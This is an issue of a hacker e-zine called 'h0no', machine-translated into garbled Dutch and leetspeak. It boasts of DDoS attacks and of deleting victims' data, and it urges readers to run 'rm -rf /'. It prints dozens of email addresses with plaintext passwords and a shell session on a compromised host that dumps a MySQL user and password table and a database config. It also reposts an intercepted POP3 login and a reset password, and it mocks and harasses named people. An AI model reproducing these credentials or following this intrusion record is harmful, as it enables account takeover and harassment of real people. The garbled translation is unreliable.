HAC

This will be the last issue of h0no. All members have quit hacking
and left the internet.

#! / Bin / rm-rf / jezelf
################################################## #########
# # 0wn & rm 0wn & rm 0wn & rm 0wn & rm 0wn & rm # #
# # ,—– 0-wnrmanddontforgetto —–. # #
# # >———————————————– — <# #
# # | -~-~-~ Hack @ work -~-~-~ | # #
# # >———————————————– — <# #
# # | -~-~-~ Hack @ school -~-~-~ | # #
# # >———————————————– — <# #
# # | -~-~-~ Hack @ bibliotheek -~-~-~ | # #
# # >———————————————– — <# #
# # | -~-~-~ Hack @ vriend het huis -~-~-~ | # #
# # >———————————————– — <# #
# # | -~-~-~ Hack @ presidentiële nominatie -~-~-~ | # #
# # >———————————————– — <# #
# # `—– Maar – nooit – – uw – home —– ‘# #
# # Het moeilijkste zine te rool de scène. # #
################################################## #########
##::::::::::::::::::::::::::::::: W3: 4r3: tw0: buzy: 0wn1ng:: # #
##::::: ###:: # # #: #########:::::::: T0: m4k3: n3w: 4scii ::::##
##::::: ###:: # # # ###::: ####::::::::::::::::::::::::: :::##
##::::: ###:: # # # ###:: #####: ###::::::: #########::::: : # #
##::::: ######### # # # # # # # #: ########: ###:::: ###::::: # #
##::::: ###:: # # # # # # # # # # #: ###:: # # # ###:::: ###:::::##
##::::: ###:: # # # # # # #####::: ###:: # # # ###:::: ###:::::# #
##::::: ###:: # # #: #########:: ###:: # # #: #########::::: : # #
##::::::::::::: HAPPY: THXGIVING: SEC: INDUSTRIE ::::::::::::::##
################################################## #########
# # [Root @ localhost: ~] # rm-rf / # #
##-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~ -~-~-~-##
# # Doen jezelf een gunst en rm-rf / # #
##-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~ -~-~-~-##
# # [Root @ localhost: ~] # ls # #
# # Bash: ls: command not found # #
################################################## #########
##::::::::::::::::::::::::::::::: H0no: n3w: 4ffl1l14t3 :::::##
##:::::::::::::::::::::::::::( Th3y: suck: 4t: 4scii: 4sw3ll): # #
# # #########: #########: ###::: # # # ########:: ###:: # # #: # #
##:::::: # # # ###::: # # # # ####:: # # # ###::::::: ###:: ###:# #
##::::: # # #: ###:: ##### #####: # # # ###::::::: ###:: ###:# #
##:::: ###:: # # # # # # # # # # # # # # # # ####### # # #########:##
##::: ###::: # # # # # # # # # # #: ##### ###::::::: ###:: ###:##
# #: ####:::: #####:: # # # ###:: # # # # ###::::::: ###:: ###:# #
# # #########: #########: ###::: # # # ########:: ###:: # # #: # #
##:::::::::::::::::::::::::::::::::::::::::::::::: :::::::##
##:::::::::::::::::” W3: t4ught: r4f4: 3v3ryth1ng: h3: kn0wz “::##
################################################## #########
# # 2005 – ~ -2005 – ~ -2005 – ~ -2005 – ~ -2005 – ~ -2005 – ~ -2005 – ~ -2005 # #
################################################## #########

Bericht van de Dag, segfault.net

— 17/12/2004 10:23
— Welkom bij
— IRCS.
— .________._______._____ ._______.______ .____. ___ _____._
— | ___/: .____/:_ ___ \: _ ____/: \ | | ___ | | \ __ _: |
— | ___ \ |: _ / \ | |___| _ / |. | | | | | | |: |
— | / | / \ | / | | | |: | |: | | | / \ | |
— |__:___/ | _.: __/|. __ | | _. | |___| | | | | / \ | |
–: /: / |. |: / |___||. _____/ |______/ |___|
–: /: /
–:. Netto:

— Uw IRCOp Team is op ircs.segfault.net
— Skyper@segfault.net (skyper)
— Gamma@segfault.net (gamma)
— Andi@segfault.net (Andi)
— Hendy@segfault.net (hendy)

— “H0no rux”

2 d4yz l4t3r …

*** IRCS opnieuw gesloten voor het grote publiek ***
We gestopt te geven certificaten.
Graag als u een gebruiker gebonden certificaat.
Zullen we geven 1 certificaat voor alle nieuwe gebruikers in jan 2005.
Yours sincerly,
* Sluit retry # 66127 .0.0.1 (31337)

– 1.txt Intr0dukti0n
00.txt -~-~-~ 50 whitehat email accountz voor u rm.
01.txt -~-~-~ tal0n `s hoogste hacker hervatten
02.txt -~-~-~ cyberarmy lijk gebruikt en misbruikt
03.txt -~-~-~ Tales Van de Dark Side of The Net
04.txt -~-~-~ shcrew legt h0no!
05.txt -~-~-~ perlsex [aka. Hoe u gestelde]
06.txt -~-~-~ Exploit Modelling and Veralgemenisering 2
07.txt -~-~-~ d4nc3 d4rkcub3, d4nc3
08.txt -~-~-~ bhs-authkeys h4s een c4s3 0f th3 buff3r 0v3rphl0wz
09.txt -~-~-~ grondig de milf jager
10.txt -~-~-~ Incerptz uit Misleiding Magazine
11.txt -~-~-~ th3 h0no gu1d3 t0 g3tt1ng bust3d
12.txt -~-~-~ H0NO internet programma protocol specificatie
13.txt -~-~-~ boobys UIT liarz
14.txt -~-~-~ Morning_wood gaat slap
15.txt -~-~-~ cripy de gids te worden elite
16.txt -~-~-~ doni038 heeft een slechte dag
17.txt -~-~-~ pissen arme tal0n
18.txt -~-~-~ Mr pd ontmoeten Mr rm
19.txt -~-~-~ inbraak in atomix de persoonlijke ruimte
20.txt -~-~-~ hack em up
21.txt -~-~-~ rotor kreeg eigendom
22.txt -~-~-~ hackthismoron.org [aka. Soulsyphon cant hack]
23.txt -~-~-~ hacker’z warez vaultz
24.txt -~-~-~ geval van het ontbreken scène hoer
25.txt -~-~-~ atomix nogmaals
26.txt -~-~-~ pROjeCKt “HeY MaM!”
27.txt -~-~-~ h0no h1tz th3 b0ttl3
28.txt 0utr0

– 1.txt-~-~-~ Intr0dukti0n

Welkom terug fuckz, de enige zine niet op textfiles.com.
Meer ownings dan een pr0j3ct m4yh3m cel, meer is dan een rm
Jobe wachtwoord raden zitting, 0dayz meer dan een zone-h
Forum. Bent u klaar voor de volgende aflevering van de ooit
Gevreesd h0no zine? U beter fucking hoop dat u alle pgp’d
Uw warez verdubbeld en gecontroleerd uw pda voor keyloggers.

We hebben gemerkt dat veel van whitehats hebben stoppen met irc.
Zelfs de grootste irc hoer van hen allen heeft gezien zijn
Laatste dayz op de eris gratis netwerk. Dit is een ingrijpende
Vooruitgang voor de hacker-gemeenschap. En niet
Zelfs denken aan schuilplaatsen op retarded fucking silc, zullen we
Ddos dat shit sneller dan darkacid’s gepatenteerde
. / Syn-ack-fin-ping-zap-mircforce-allinone
Hopelijk voor het einde van het jaar alle efnet, unet,
Freenode servers en zal delinkt. Volg
OseK & uitgeslapen voorbeeld, DDoS iedereen die gesprekken.

Ho, ik zie ircsnet knowz whats up. Een meer ircd
Offline genomen door de niet aflatende h0no ddos attaq!
Skyper is het schudden in pheer, gamma is de controle op alle
Warez zijn voor BDZ. Fx, denkt hij beter worden veilig
Is h0noIDSd laten draaien (hij thinkz itz cmn’z 0day
Warez detector). Scut, de enige echte hacker op
Planeet aarde, hoopt te besparen zich uit
Vernedering en beslist om toe te treden tot h0no. Hij echo’z
“H0no – pr0uD suPp0rT3rZ Van wh1t3h4ts 4nd the1r rm’d b0x3z.”
In / etc / motd, maar get’z “rm-rf ~ / code /`
Geïnjecteerd in zijn terminal voordat hij pressez terugkeren.
Hier aan de liefde h0no, of klaar te voelen de
Pijn van onze zone-h 0day.

U heeft gevraagd voor bx ownings, kreeg je het. U heeft gevraagd
Voor backdooring whitehat software, kreeg je het.
U heeft gevraagd voor meer mailspools, rm’ings meer, meer
0days, u got it! Voor onze zone-h vrienden we
Wenst in te voeren voor de terugkeer van de
Johnqpublic mailinglijst! That’s right, nu u
Dont zelfs nodig een 0dd lidmaatschap te winnen in ops
# Darknet.

Dit probleem is niet op enigerlei wijze. Jammer.

00.txt-~-~-~ 50 whitehat email accountz voor u rm.

4ft3r 0wn1ng th3 bugtr4q p0st1ng w4nn4b3z@whitehat.co.il w3 d3c1d3d t0 us3 th31r 0wn
R41nb0w t4bl3 t0 cr4ck s0me p4ssw0rdz fr0m th31r us3r db. 2 m0nthz 0f cr4ck1ng, 4nd
Th3y n3v3r 3v3n n0t1c3d. Lucky f0r y0u p3n-t3st3rz, w3 d1dnt g3t ar0und t0 b4qd00r1ng
Wh0pp1x … Y3t. 4nd r3m3mb3r, 4lw4yz c0mp1l3 l1nux s3cur1ty m0dul3z wh3n 1nst4ll1ng
4 n3w d1str0. H4rh4rh4r.

Blsp2003@yahoo.com pass: 85208520
Sene@speedy.com.ar pass: 006892 <- 0wn3d f4st3r th4n 4 sp33d1ng bull3t.
Cnotemisha@hotmail.com pass: 080770 <- w3 rm’d 4ll th1s guyz 3m41lz.
Guilamupub@ifrance.com pass: 170979
J4f0@hotmail.com pass: yali604 <- 00pz, th0ught th1s w4s j4f.
St4n@safe-mail.net pass: lonya2k <- y0ur m41l 1s n0t s4f3.
Kesakki@hotmail.com pass: drockford
Sleepytechnics@ziplip.com pass: doop1
Morningwood@thepub.co.za pass: qazwsx <- bu4h4h4h4, m0r3 0p th1s cl0wn l4t3r.
Vi_ce@Phreaker.net pass: h4x00r?
Axess@inbox.ru pass: Janina
Ben.alamio @ gmail.com pass: 046238317 <- w3 s3nt h4t3 l3tt3rz t0 th1s m0r0nz gf.
Invisible_true@web.de pass: wasgeht.,
Nielsmans@chello.nl pass: andrehazes12
Metatron12344@hotmail.com pass: foxwood
Blaublut05@hotmail.com pass: 06sandra22
Bigtymer809@mail.com pass: jeugdcriminaliteit <- 0wn3d th1s p1mp.
Ctzokas@aol.com pass: 51l3nt50ul
SKulls.inc @ web.de pass: ja09021971 <- h3 3m41l3d skyp3r 4sk1ng f0r 4n4l s3x.
Jvandertil@home.nl pass: Xdfez28d
Filip_waeytens@yahoo.com pass: gu9Quoro <- w4tch h1m b3g f0r j0bz. 4lm0st 4s b4d 4s m0rn1ngw00d.
Dpendich@yahoo.co.uk pass: mija1joka
Digger@telenet.be pass: lotuselise0
Valvesoftware@gmail.com pass: deadheart <- h0no l0v3z myg0t. K33p up th3 g00d w0rk.
Funnykiller@hotmail.com pass: 17231723 <- 0nly th1ng grappig 1s y0ur w34k p4ss.
Binbag@bonbon.net pass: hm0761 <- n0t 3v3n h0tp0p c4n s4v3 y0u n0w.
Jvandertil@home.nl pass: Xdfez28d
Kill3r_lw@hotmail.com pass: Augsburg
Physaro@mail.ru pass: mk020688 <- h00k3d ons up w1th m00 w4r3z.
Nielsmans@chello.nl pass: andrehazes12 <- h00k3d ons up w1th n3tr1c w4r3z.
Fajfajf@wp.pl pass: kopijk2 <- h00k3d ons up w1th is3c w4r3z.
Wikeee@hotmail.com pass: jackass <- h00k3d ons up w1th 0s3c p0rn.
Broach27@hotmail.com pass: d1m1tr1
Mtm@iaml33t.com pass: l33tc0m <- d0nt fuck w1th th3 tru3 3l33tz.
Allenrintoul@yahoo.com pass: 19yrdd30
Phinix@gmail.com pass: 9910nm <- d0rk wh0 c4nt c0de.
Joker45@mails.de pass: lol50lol
Bzillins@gmail.com pass: Armm700Ada <- CCN4 stup1d1ty @ 1tz f1n3st.
Xxradar@radarhack.com pass: LYHYYTvp
Maartenb@cistron.nl pass: thunder1
Dtredwell94@yahoo.com pass: t033631397

W4s th @ f1ft33? 3y3 c4nt c0unt. Noth1ng 0p th1s b0x maar w3b sh1t.

Sh-2,05 $ grep whitehat / etc / passwd
Whitehat: x: 550:550: / home / whitehat.co.il: / bin / bash
Sh-2,05 $ cd cgi-bin
Sh-2,05 $ ls-al
Totaal 900
Drwxr-xr-x 4 whitehat whitehat 4096 juni 7 2004.
Drwxr-x – x 22 whitehat whitehat 12288 dec 18 07:37 ..
– Rw-r – r – 1 whitehat whitehat 150 juni 7 2004. Htaccess
– Rw-r – r – 1 whitehat whitehat 19 juni 7 2004. Htpasswd
– Rw-r —– 1 whitehat whitehat 1516 jun 7 2004 LICENTIE
– Rw-r – r – 1 whitehat whitehat 5212 jun 7 2004 README
Drwxr-xr-x 2 whitehat whitehat 4096 19 mei 2004 fileman-2.1.1
– Rw-r – r – 1 whitehat whitehat 867434 juni 7 2004 fileman-2.1.1.tar.gz
– Rwxr-xr-x 1 whitehat whitehat 3145 februari 7 2003 fileman.cgi
Drwxrwxrwx 2 whitehat whitehat 4096 jun 7 2004 afbeeldingen
Sh-2,05 $ cat. Htaccess
AuthUserFile / home / whitehat.co.il / html / cgi-bin / .htpasswd
AuthGroupFile / dev / null
AuthType Basic
AuthName Beschermde

Vereisen geldig-gebruiker
Sh-2,05 $ cat. Htpasswd
Muts: H.Z./aF2k1kTE
Sh-2,05 $ cd ..
Sh-2,05 $ cd e107_files
Sh-2,05 $ ls-al
Totaal 88
Drwxr-xr-x 10 whitehat whitehat 4096 Sep 29 16:04.
Drwxr-x – x 22 whitehat whitehat 12288 dec 18 07:37 ..
Drwxr-xr-x 2 whitehat whitehat 4096 maart 2 2004 backend
Drwxr-xr-x 2 whitehat whitehat 4096 28 mei 2004 cache
– Rw-r – r – 1 whitehat whitehat 2533 Sep 29 16:16 def_e107_prefs.php
– Rw-r – r – 1 whitehat whitehat 416 juni 2 2004 default.css
Drwxr-xr-x 2 whitehat whitehat 4096 maart 2 2004 downloadimages
Drwxr-xr-x 15 whitehat whitehat 4096 maart 24 2004 downloads
Drwxr-xr-x 2 whitehat whitehat 4096 maart 2 2004 downloadthumbs
– Rw-r – r – 1 whitehat whitehat 741 juni 2 2004 e107.css
– Rw-rw-rw-1 whitehat whitehat 4648 Sep 29 16:16 e107.js
Drwxr-xr-x 2 whitehat whitehat 4096 maart 2 2004 afbeeldingen
Drwxr-xr-x 2 whitehat whitehat 4096 maart 3 2004 misc
Drwxrwxrwx 3 whitehat whitehat 8192 dec 19 19:55 publiek
– Rw-rw-rw-1 whitehat whitehat 9381 Sep 29 16:04 resetcore.php
– Rw-r – r – 1 whitehat whitehat 642 Sep 29 16:04 style.css
– Rw-r – r – 1 whitehat whitehat 0 juni 2 2004 user.js
Sh-2,05 $ mysql – user = whitehat_ntlm – password = dantlmpwoject
Welkom op de MySQL monitor. Commando eindigen met; of \ g.
Je MySQL-verbinding id 15175305 is aan de server versie: 4.0.14-log

Type ‘help;’ of ‘\ h’ voor hulp. Type ‘\ c’ om de buffer.

Mysql> show databases;
+—————+
| Database |
+—————+
| Whitehat_ntlm |
+—————+
1 row in set (0,00 sec)

Mysql> gebruik whitehat_ntlm
Reading tabel informatie voor de voltooiing van tafel en kolomnamen
U kunt deze functie uit te krijgen met een snellere opstarttijd-A

Database veranderd
Mysql> show tables;
+————————-+
| Tables_in_whitehat_ntlm |
+————————-+
| Ntml_login |
| Ntml_tables |
| Ntml_users |
+————————-+
3 rows in set (0,00 sec)

Mysql> select * from ntml_users;
+—-+————-+————+
| Id | gebruikersnaam | pwd |
+—-+————-+————+
| 4 | muts | ntlmthang |
| 5 | havens | 0469gj7tio |
| 6 | Dyngnosis | ewenm0re |
| 7 | skiller | T5oa0rlu |
| 8 | illwill | 4PoekIEt |
| 9 | st4n | prOuqO92 |
| 10 | sl33py | z8u7oapr |
| 11 | koka | p9lUph2A |
| 12 | icem3n | 6iumouD1 |
| 13 | Viking | MiU0oeHL |
| 14 | epikorous | dO7foU1o |
| 15 | jerryshenk | slek6ah3 |
| 16 | realmus | kL55iETr |
| 17 | bitwild | fLEdOa7i |
| 18 | syko | X1ubrLAm |
| 19 | sterrenstof | 6oapOEfr |
| 20 | xxradar | piag7eWr |
| 21 | GuYoMe | XLucouM0 |
| 22 | gabriel | tHluV4ut |
| 23 | Saphirio | cR5uf6lu |
| 24 | phrozen77 | 9oEtHies |
| 25 | sh4d0w | M7abRiEK |
| 26 | kodkod | 6lEtH0as |
| 27 | foobar | jiUD7oeS |
| 28 | Lonsdale | p0iUGoaY |
| 29 | cReDiAr | p0iUGoaY |
| 30 | wiley | qleki43L |
| 31 | herziene | swoU33eT |
| 32 | villanovax | fr9UPrOe |
| 33 | bigticket | dRo2sOAr |
| 34 | psich | DL0tri5d |
| 35 | smeagul | cr1no! 0 |
| 36 | itzik | cHIabr6a |
| 37 | Blsp | d0uFRled |
| 38 | WiNeOS | spleziu0 |
| 39 | mandoskippy | kl15a01 |
| 40 | J-ATHIAS | wrOE29ut |
| 41 | s1ruS | klemI02l |
| 42 | Andy | N48stlUr |
| 43 | ThaGangsta | XLustlUr |
| 44 | Lotek | Sc4p3r45 |
| 45 | l33ters | kleUPrOe |
| 46 | Titon | rLAmkleU |
| 47 | hegemonie | d0uFbrLA |
| 48 | phenfen | z8uleq2c |
| 49 | ark | d0uFI0cC |
| 50 | HMS | 0oufIAno |
| 51 | gabry | ouM0N48d |
| 52 | z0mbi3 | 0rluFdf3 |
| 53 | SeC_SquaD | brlesT6u |
| 54 | c0axial | Fdf3led5 |
| 55 | vice | 0rlFk6ah |
| 56 | striz | dlasw4Ef |
+—-+————-+————+
53 rijen in set (0,00 sec)

Mysql> select * from ntml_login
Select * from ntml_login;
+———–+———————————-+– ———-+—————–+——————— ——————————-+
| Gebruikersnaam | uin | verstrijkt | ip | browser |
+———–+———————————-+– ———-+—————–+——————— ——————————-+
| Phrozen77 | 927738bed5ead0abdba7b587d5820c92 | 1103492331 | 217.224.199.249 | T 5,0; de-DE; rv: 1.7.5) Gecko/20041122 Firefox/1.0 |
+———–+———————————-+– ———-+—————–+——————— ——————————-+
1 row in set (0,01 sec)
Mysql> exit
Bye
Sh-2,05 $ cd .. / 5
Sh-2,05 $ ls-al
Totaal 272
Drwxr-xr-x 2 whitehat whitehat 4096 aug 15 04:55.
Drwxr-x – x 22 whitehat whitehat 12288 dec 18 07:37 ..
– Rw-r – r – 1 whitehat whitehat 1325 juli 19 07:45 action.php
– Rw-r – r – 1 whitehat whitehat 1620 juli 19 07:45 admin.php
– Rw-r – r – 1 whitehat whitehat 603 juli 19 13:54 config.inc.php
– Rw-r – r – 1 whitehat whitehat 1893 augustus 7 11:05 index.html
– Rw-r – r – 1 whitehat whitehat 786 juli 19 09:18 index.html.orig
– Rw-r – r – 1 whitehat whitehat 2860 juli 19 15:56 list.php
– Rw-r – r – 1 whitehat whitehat 1748 juli 19 07:45 login.php
– Rw-r – r – 1 whitehat whitehat 2252 juli 19 07:51 login_check.inc.php
– Rw-r – r – 1 whitehat whitehat 172 juli 19 07:45 logout.php
– Rw-r – r – 1 whitehat whitehat 220368 augustus 7 11:06 md5.jpg
SH-2,05 $ pwd
/ Home/whitehat.co.il/html/5
Sh-2,05 $ cat config.inc.php
Kat config.inc.php
/ / MySQL gegevens
$ Mysqlhost = “localhost”;
$ Mysqluser = “whitehat_md5p”;
$ Mysqlpwd = “fuckingwork @”;
$ Mysqldb = “whitehat_md5″;
Mysql_connect ($ mysqlhost, $ mysqluser, $ mysqlpwd);

$ Adminpwd = “whosyourdaddy”; / / gebruikt voor het toevoegen van gebruikers
$ Datum = datum ( “d.m.y”);

/ / Userdata – niet veranderen
$ Get_username_only = mysql_db_query ($ mysqldb, “select * from md5p_login waar uin = ‘$ UIN” “);
$ Username_only = mysql_fetch_object ($ get_username_only);
$ Get_userdaten = mysql_db_query ($ mysqldb, “select * from md5p_users waar gebruikersnaam = ‘$ username_only-> gebruikersnaam'”);
$ Userdaten = mysql_fetch_object ($ get_userdaten);
?> Sh-2,05 $

N33dl3ss t0 s4y, th3s3 wh1t3h4t fuckz g0t 0wn3d t0 h3ll n b4ck. Dan 1t 1z y0ur plicht t0 rm th31r m41l 4s4p!
4ls0, 4s 4 n0t3 t0 mutz, pl34s3 k33p m0r3 0d4yz 0p th1s s3rv3r. W3 h4t3 t0 us3 0ur 0wn.

01.txt-~-~-~ tal0n `s hoogste hacker hervatten

Tal0n `1s 4n 3x-d3f4c3r 4nd curr3nt l34d3r 0f th3 3v3r sk1ll3d g0tf4ult
S3cur1ty gr0up. H3 1s 4ls0 curr3ntly un3mpl0y3d. N0t1c3 4s st4t3d
B3f0r3 1n h0no, tal0n `cl4mz t0 b3 21 y34rz 0ld. Th4t’z 4l0t 0f t1m3
Sp3nt try1ng t0 gr4du4t3 h1gh sch00l. L0lz.

Naam:
Contact: cyber_talon@hotmail.com of cybertalon@gmail.com

Doelstelling: Seeking positie als netwerk-en / of systeembeheerder
Of veiligheid anaylst / consulant.

Onderwijs: High School Student.

Vaardigheden: Administratie – Linux / BSD Systeem en Netwerk Beheer.
Hardware – Building, Ontwikkeling, Trouble shooting.
Operating Systems – BSD, Linux, Solaris, Windows.
Programming – ASM, C, C + +, Perl, UNIX Socket.
Networking: Filtering, Firewalls, Routers, TCP / IP.
Scripting – BASH, HTML.
Software – Console, FTPd, HTTPd, KDE, SSHd.
Andere – Advanced Configuration and Development, Code Auditing,
Mensen Vaardigheden.

Ervaring: BSD – 2 Jaar
Linux – 3 Jaren
Solaris – 6 maanden
Windows – 5 Jaren

Networking: 5-6 succes networked computers samen met een
Router en een schakelaar via een kabel internet verbinding.
Schreef / etc / host bestanden op Linux / BSD voor gemakkelijke toegang.
Ervaring met netwerk mapping, ontdekking, en sommige
Routing.

Schriftelijke Code: DES Tekst Encryptor – http://www.hbx.us/tal0n/code/cit.c
HTTPd Checker – http://www.hbx.us/tal0n/code/httpd-chk.c
RAW Packet Crafter —

Http://www.hbx.us/tal0n/code/pcraftv2.c

Root Password Generator —

Http://www.hbx.us/tal0n/code/trpg.c

System log injector —

Http://www.hbx.us/tal0n/code/loginject.c

Geschreven teksten: Beginners Guide to UNIX Sockets op Linux in C —

Http://www.hbx.us/tal0n/papers/unixsocket-guide.txt

Code Auditing in C —

Http://www.hbx.us/tal0n/papers/codeauditing.txt

FreeBSD Security technieken —

Http://www.hbx.us/tal0n/papers/fbsd-sec-teqs.txt

Introduction to Social Engineering —

Http://www.hbx.us/tal0n/papers/social-engineering.txt

Linux systeem Administators Security Guide —

Http://www.hbx.us/tal0n/papers/lin-adm-secguide.txt

Andere hobby’s / Vaardigheden: Basketball, Techniek, uitvinden, Motorsport,
Veiligheid, Tennis.

D34r tal0n “,
H0no 1s curr3ntly 1n n33d 0f een jr. M41lr00m 4tt3nd3nt. W3
F33l 4s 1f y0ur c0ntr1but10nz t0 th3 s3cur1ty c0mmun1ty c0uld b3tt3r
B3 s3rv3d h4ndl1ng 3nv0l0p3z 0f 4nthr4x th4n n3tw0rk1ng y0ur g4m3b0y
4dv4nc3z t0g3th3r. 1f s3l3ct3d f0r th3 j0b w3 h0p3 y0u w1ll h3lp 0ur
Curr3nt t3nn1s t34m door supply1ng 4n 3xtr4 r4ck3t. W3 br0k3 0n3 0v3r
M1tn1ck’z h34d 4t th1s y34rz d3fc0n. Pl34s3 r3sp0nd 4s4p, 4s th1s
0ff3r w0nt l4st l0ng. 4tt4tch3d 1s 4 n3w h4ck3r r3sum3 t3mpl4t3 f0r
Y0ur futur3 us3. G00d luck!

– W3 0wn y0ur 4ss,
H0no.

-~-~-~ H4ck3rcr4ck3r.txt

H3ll0 ~! @ # Mijn n4m3 1s __ [naam] __, maar y0u c4n c4ll m3
__ [Handle] __. C0nt4ct M3 0p 4lt.s3x.s1st3r

Mijn 0bj3ct1v3 1s t0 __ [h4ck/d0s/sp4m/b3c0m3 bugtr4q st4r] __

3duc4t10n: g.3.d.. W3ll 4lm0st, 3y3 n33d een j0b t0 p4y f0r b00kz! @ #

Mijn sk1llz 1nclud3, maar 4r3 n0t l1m1t3d t0 …
Pr0gramm1ng & scr1pt1ng – 0r wh4t 3y3 l1k3 t0 c4ll b0rl4nd
Bu1ld3r’1ng.

4dm1n1str4t10n – th1s 1s wh4t y0u d0 4ft3r y0u 0wn 4 b0x. H3h3

0p3r4t1ng syst3mz – win 3.1,98, nt, lunix, nuxi, OS10xpl.50sp,
__ [Osirisis / obsd / macos 4/juniper os] __
(Dan 1t r34lly d03snt m4tt3r s1nc3 w1nd0wz 1s
4ll y0u’ll b3 lus1ng.)
0th3rz – 4DV4ND3D! C0nf1gur4t10n (. Bashrc & 3d1t1ng cr0n j0bz)

3xp3r3nc3 1nclud3z, 4nd 1s s3v3r3ly l1m1t3d t0 …
St4rt1ng w1nd0wz 4nd b34t1ng mijn s1st3r.

N3tw0rk1ng! @ # (Mijn sp3ch1alty)

3y3 c4n c4ll t3chn1c4l supp0rt 4ny t1m3, 4ny wh3r3 w1th mijn
N4t10nw1d3 c3llul4r ph0n3 c0v3r4g3 door spr1nt st .!!!!

3y3 th1nk 3y3 h4v3 s33n 4 __ [c4t5e/f1b3r/c0x14l/1nt3rn3t] __
C4bl3 b3f0r3.

Wr1tt3n c0de …

1t’z 4ll b33n rm’d du3 t0 l4m3n3ss. 3y3’ll g3t
__ [V1l3 `/ bx / blauw zwijn / rode draak / paars jimi] __ t0 c0de
S0m3th1ng f0r m3.

Wr1tt3n t3xt .. (Pl34s3 n0t3 th4t 3y3 wr0t3 th3s3 m0stly door mijn s3lf, mijn
S1st3r h3lp3e w1th sp3ll1ng. Maar 0nly 4 l1ttl3 !!@#)

H0w t0 b4r3b4ck, th3 g4y w4y.
Us1ng, 4nd r3us1ng c0d3.
H0w t0 aud1t f0r strcpy de 1n j4v4

Futur3 b00k r3l34s3 1s pl4nn3d w1th so1o 1n 2005! @ #
(T1tl3: h0w t0 h4ck 4m3r1c4n sh1tbr1ckz. Vol. 1)

0th3r H0bb13s/Sk1llz …

3y3 c4n run n4k3d 4r0und mijn h0us3 1n und3r 4 s3c0ndz.
Curr3ntly l43rn1ng 4b0ut c0ndumz 1n h43lth cl4ss.
C4n m4k3 4 qu4ck1ng n01s3 w1th mijn n0s3.
T3nn1s. (3y3 4m th3 n3xt 4urth3r 4sh)

02.txt-~-~-~ cyberarmy lijk gebruikt en misbruikt

Door kajun.

Ik iemand gehackt! Wilt horen? Dont vertellen wie het was me!
Ik haat het cyberarmy. Ik heb geprobeerd hun uitdagingen, maar ik kan alleen
Maken het tot trooper. Na vragen mryowler voor hulp hij vertelde me
Leren netwerken .. Fuck dat. Netwerken is voor als dorks die zitting
Alle dag up subnetten voor hun lans van dreamcasts.

In plaats daarvan zat ik op irc en message boards hopen sommige hackers zou
Vertel me wachtwoorden te gehackte accounts. Hehe, dit werkt goed en ik kan
Nog beat uit naar mijn jpegs van di] v [selen.

Het is gewoon zo dat ik op het forum als cyberarmy.net
Gepost iemand met de nickname van ‘eYeOwNYoUaLL’. Te oordelen naar zijn
Nickname deze kerel is een opperste hacker. Onnodig te zeggen dat ik niet
Teleurgesteld door zijn post, check het uit:

Gepost door: eYeOwNYoUaLL
Op vrijdag 29 oktober 2004 door *. ownz.shcrew.net

H3Y B0YZ 4ND G1RLZ, TR00P3RZ 4ND G3N3R4LZ. 3Y3 W4S SN1FF1NG
S0M3 K0R34N’Z N3T WH3N ik R4N ACC0SS TH1Z.

+ OK <1219,1082946821 @ ch0wn.com>
Gebruiker sirexar@crazy-horse.net
+ OK
Pass ch0wnj00

1PH U N33D H3LP L0G1N1NG 1N JUST 4SK M3 0N H0N0’Z 0FF1C4L
1RC CH4NN3L, # DARKNET (TH4TZ 3FN3T, N0T CYB3R4RMY 1RCD).

Ik kon mijn ogen niet geloven. Ik weet dat ik zag een gebruikersnaam en wachtwoord in
Er, maar er was een hoop shit te netwerken. Ik meteen
Trillian geopend en bezocht dit kanaal # darknet. WOW! Elite guys
In. Ik was bijna zo geïntimideerd dat ik mijn shorts room.
Gelukkig voor mij maar ik ging naar de badkamer te slaan uit 5 Minuten voor.

EYeOwNYoUaLL hielp me in prive berichten. Hij zei dat om een pop3
Client of wat dan ook. Ik heb niet luisteren. In plaats Ik vertelde hem zojuist show
Me een e-mails uit cyberarmy.net. Deze h0no jongens zijn zeer nuttig.
Hij messaged me dit:

* Er1cbrux is er1cbrux! Efnet@icerslair.com eY3OwNYoUaLL
* Er1cbrux is + # darknet
* Er1cbrux heeft stilgezeten 1452 uur 12 min 53 sec.
* Er1cbrux is met irc.efnet.org
Er1cbrux! Efnet@icerslair.com> h3r3 dan 1t 1z ..
Er1cbrux! Efnet@icerslair.com> From: “CyberArmy”
Er1cbrux! Efnet@icerslair.com>
Er1cbrux! Efnet@icerslair.com> To: “ViRsOveRiD”
Er1cbrux! Efnet@icerslair.com>
Er1cbrux! Efnet@icerslair.com> Datum: 28 2004, 01:09:30 PM
Er1cbrux! Efnet@icerslair.com> Betreft: Password Reset succes
Er1cbrux! Efnet@icerslair.com> (virsoverid)
Er1cbrux! Efnet@icerslair.com>
Er1cbrux! Efnet@icerslair.com> —————————————-
Er1cbrux! Efnet@icerslair.com> —————————————
Er1cbrux! Efnet@icerslair.com>
Er1cbrux! Efnet@icerslair.com> Het volgende is een geautomatiseerd e-mailbericht van
Er1cbrux! Efnet@icerslair.com> CyberArmy.
Er1cbrux! Efnet@icerslair.com>
Er1cbrux! Efnet@icerslair.com> Hallo, virsoverid
Er1cbrux! Efnet@icerslair.com> Dit is een bevestiging dat uw
Er1cbrux! Efnet@icerslair.com> CyberArmy wachtwoord
Er1cbrux! Efnet@icerslair.com> is teruggezet naar: 19aHPxl6
Er1cbrux! Efnet@icerslair.com>
Er1cbrux! Efnet@icerslair.com> —
Er1cbrux! Efnet@icerslair.com> CyberArmy,
Er1cbrux! Efnet@icerslair.com> http://www.cyberarmy.net/about/
Er1cbrux> thanks dude!
Er1cbrux> u nog aanmeldingen voor porno ftps?

Hij gaf geen antwoord op mijn laatste verzoek. Hij moet zijn drukke hacking
Sommige voor mij. Ik heb geprobeerd om terug te gaan naar efnet later omdat ik couldnt
Achterhalen hoe om in te loggen op cyberarmy, maar hij was niet meer in
# Darknet. Hopelijk iemand die er kan dit cijfer grote hacker
Mysterie!

PS. Cyberarmy.com regels cyberarmy.net. Mryowler code kan cirkels
Om je heen. Netto dwazen.

PSS. Ik hoorde sirexar is een ircop op cyberarmy de ircd. Ik hoop dat niemand
(Wa1800z@cyberarmy.net) per e-mail hem ircop pass. Iemand
Login en check this out voor mij!

03.txt-~-~-~ Tales Van de Dark Side of The Net

T00 3l173 f0r ons, 1tz th3 TDSN z1n3 @! # Str8 fr0m b0b’z sh3ll.

Здддддддддддддддддддддддддддддддддддддддддддддддддддддд ©
